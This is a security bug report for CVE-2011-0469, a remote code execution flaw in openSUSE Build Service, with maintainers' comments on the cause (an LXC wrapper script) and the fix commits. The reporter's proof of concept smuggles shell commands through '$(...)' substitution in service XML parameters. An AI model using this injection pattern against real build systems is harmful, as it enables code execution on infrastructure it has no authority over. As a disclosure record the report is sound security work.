679325 – (CVE-2011-0469) VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution

Bug 679325 (CVE-2011-0469) - VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution

Summary: VUL-0: CVE-2011-0469: openSUSE Build Service: remote code execution

Status:	RESOLVED FIXED

Alias:	CVE-2011-0469

Product:	openSUSE.org
Classification:	openSUSE
Component:	BuildService (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P2 - High Severity: Major (vote)
Target Milestone:	---
Assignee:	Adrian Schröter
QA Contact:	Adrian Schröter

URL:
Whiteboard:
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2011-03-14 10:50 UTC by Matthias Weckbecker
Modified:	2017-08-02 15:58 UTC (History)
CC List:	2 users (show)

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Matthias Weckbecker 2011-03-14 10:50:33 UTC

Adrian, as discussed last week the service-code contains various remote code execution vulnerabilities which allow attackers to execute arbitrary code on build systems with nobody-privileges. 

Ludwig suggested to open a bug for the issue in order to keep it tracked.

POC:

Add the following service to your project to get access to a machine w/ internet connectivity:

 <services>
  <service name="download_url">
    <param name="protocol">ftp</param>
    <param name="host">cpan.myclash.net</param>
    <param name="path">$(uname -a; exit 0)</param>
  </service>
  <service name="verify_file">
    <param name="file">$(uname -a)</param>
    <param name="verifier">md5</param>
    <param name="checksum">645ea983242177e446d68905cb5ecda5</param>
  </service>
 </services>

Comment 1 Ludwig Nussel 2011-03-14 10:59:31 UTC

use CVE-2011-0469

Comment 2 Christian Dengler 2011-03-14 11:28:10 UTC

The first script, I found this issue in, is fixed now (sr 64070).

But the other services, especially with network connection, contain a higher risk.

Comment 3 Adrian Schröter 2011-03-14 11:31:33 UTC

This was only possible when using the "experimental lxc wrapper for additional security ;)". This is fixed now. I will include the fix in next 2.1 release, but I have some serious doubts that anyone else ever used the LXC wrapper (because it is quite tricky to get it working anyway).

Comment 4 Adrian Schröter 2011-03-14 11:33:19 UTC

Comment 2: The problem was not the particular service, it was buggy, but safe. The problem was the lxc wrapper script (only used on server side so far).

Comment 5 Marcus Meissner 2017-08-02 15:54:06 UTC

main fix is in:
https://github.com/openSUSE/open-build-service/commit/76b0ab003f34435ca90d943e02dd22279cdeec2a

secondary fix in:

https://github.com/openSUSE/open-build-service/commit/23c8d21c75242999e29379e6ca8418a14c8725c6

Comment 6 Marcus Meissner 2017-08-02 15:58:24 UTC

no official announcemnet on openbuildservice.org.